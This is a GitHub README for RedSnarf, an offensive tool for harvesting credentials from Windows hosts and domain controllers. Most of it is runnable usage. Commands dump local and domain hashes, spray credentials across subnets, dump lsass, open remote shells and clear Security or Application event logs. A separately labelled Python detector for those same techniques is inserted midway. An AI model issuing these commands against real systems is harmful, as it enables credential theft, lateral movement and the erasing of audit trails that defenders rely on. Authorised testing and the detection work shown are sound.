MyChickenNinja / redsnarf

RedSnarf is a pen-testing / red-teaming tool for Windows environments

Home Page: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/


     ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         

RedSnarf is a pen-testing / red-teaming tool by Ed William and Richard Davy for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.

RedSnarf functionality includes: 

• Retrieval of local SAM hashes;
• Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;
• Retrieval of MS cached credentials;
• Pass-the-hash;
• Quickly identify weak and guessable username/password combinations (default of administrator/Password01);
• The ability to retrieve hashes across a range;
• Hash spraying -
  o Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;
• Lsass dump for offline analysis with Mimikatz;
• Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;
• Dumping of Domain controller hashes using the drsuapi method;
• Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';
• Ability to decrypt cpassword hashes;
• Ability to start a shell on a remote machine;
• The ability to clear the event logs (application, security, setup or system); (Internal Version Only)
• Results are saved on a per-host basis for analysis.

RedSnarf Usage
=======================

Requirements:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredRetrieve 7 - https://github.com/Neohapsis/credRetrieve7
Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - easy_install netaddr
Termcolor (1.1.0) - easy_install termcolor
dos2unix - used with parsing Mimikatz info locally 

Show Help
./redsnarf.py -h
./redsnarf.py --help

Retrieve Local Hashes
=======================

Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log
./redsnarf.py -H 10.0.0.50 -s security

Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log
./redsnarf.py -H 10.0.0.50 -s application

Retrieve Local Hashes from a single machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D .

Retrieve Local Hashes from a single machine using domain administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D yourdomain.com

Retrieve Hashes across a network range using local administrator credentials
./redsnarf.py -H 10.0.0.1/24 -u administrator -p Password01 -D .

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H 10.0.0.1/24 -u administrator -p Password01 -D yourdomain.com


Hash Spraying
=======================

Spray Hashes across a network range 
./redsnarf.py -H 10.0.0.1/24 -C credsfile -D .

Spray Hashes across a network range using a domain login
./redsnarf.py -H 10.0.0.1/24 -C credsfile -D yourdomain.com


Retrieve Domain Hashes
=======================

Retrieve Hashes using drsuapi method (Quickest)
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -i y

Retrieve Hashes using NTDSUtil
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -n y


Information Gathering
=======================

Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -P y

Decrypt Cpassword
./redsnarf.py -g cpassword


Misc
=======================

Start a Shell on a machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D . -d y

Start a Shell on a machine using domain administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D yourdomain.com -d y

Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D . -l y
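The defender-side complement to the usage above, as an added example that is not part of RedSnarf: a small detector for the log artefacts left by three of the documented techniques (clearing the Security log with `-s security`, the drsuapi method with `-i y`, and the lsass dump with `-l y`). It assumes simplified event dicts whose field names (`channel`, `id`, `subject`, `properties`, `source_image`, `target_image`, `granted_access`) are this example's own, not a real log schema.

```python
# Added example (not RedSnarf's own code): a minimal detector, from the
# defender's side, for log artefacts of the techniques documented above:
# Security 1102 (event log cleared, -s security), Security 4662 (replication
# rights exercised, drsuapi method, -i y), Sysmon 10 (lsass.exe opened for
# reading, procdump, -l y). Records are constructed, simplified sample data;
# the field names are an assumption for this example, not a real log schema.
from typing import Dict, List

# Well-known AD extended-rights GUIDs that permit replicating secrets.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# PROCESS_VM_READ (0x0010) | PROCESS_QUERY_INFORMATION (0x0400): the least a memory dumper needs.
LSASS_DUMP_MASK = 0x0410

def classify(event: Dict) -> str:
    """Return an alert string for one event, or '' when it looks benign."""
    ch, eid = event.get("channel"), event.get("id")
    if ch == "Security" and eid == 1102:
        return f"security log cleared by {event.get('subject')}"
    if ch == "Security" and eid == 4662:
        subject = event.get("subject", "")
        guids = {g.lower() for g in event.get("properties", [])}
        # Simplification: a trailing '$' means a machine account (a DC replicating).
        if guids & REPLICATION_GUIDS and not subject.endswith("$"):
            return f"replication rights used by non-DC account {subject}"
    if ch == "Sysmon" and eid == 10:
        target = event.get("target_image", "").lower()
        granted = event.get("granted_access", 0)
        # Parenthesised: '==' binds tighter than '&' in Python.
        if target.endswith("\\lsass.exe") and (granted & LSASS_DUMP_MASK) == LSASS_DUMP_MASK:
            return f"lsass memory read by {event.get('source_image')}"
    return ""

def scan(events: List[Dict]) -> List[str]:
    return [alert for alert in map(classify, events) if alert]

# Constructed sample: one record per technique plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"channel": "Security", "id": 1102, "subject": "WS01\\administrator"},
    {"channel": "Security", "id": 4662, "subject": "LAB\\DC01$",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"channel": "Security", "id": 4662, "subject": "LAB\\administrator",
     "properties": ["1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"]},
    {"channel": "Sysmon", "id": 10, "source_image": "C:\\Temp\\procdump64.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1FFFFF},
    {"channel": "Sysmon", "id": 10, "source_image": "C:\\Windows\\System32\\csrss.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1400},
]
```

`scan(SAMPLE_EVENTS)` returns three alerts and skips the DC's own replication and the query-only handle from csrss; the machine-account heuristic is deliberately crude and a real rule should compare against the known DC list.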

Additional Information
=======================

For more information please visit:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/ 

About
License: Apache License 2.0

Languages: Python 100.0%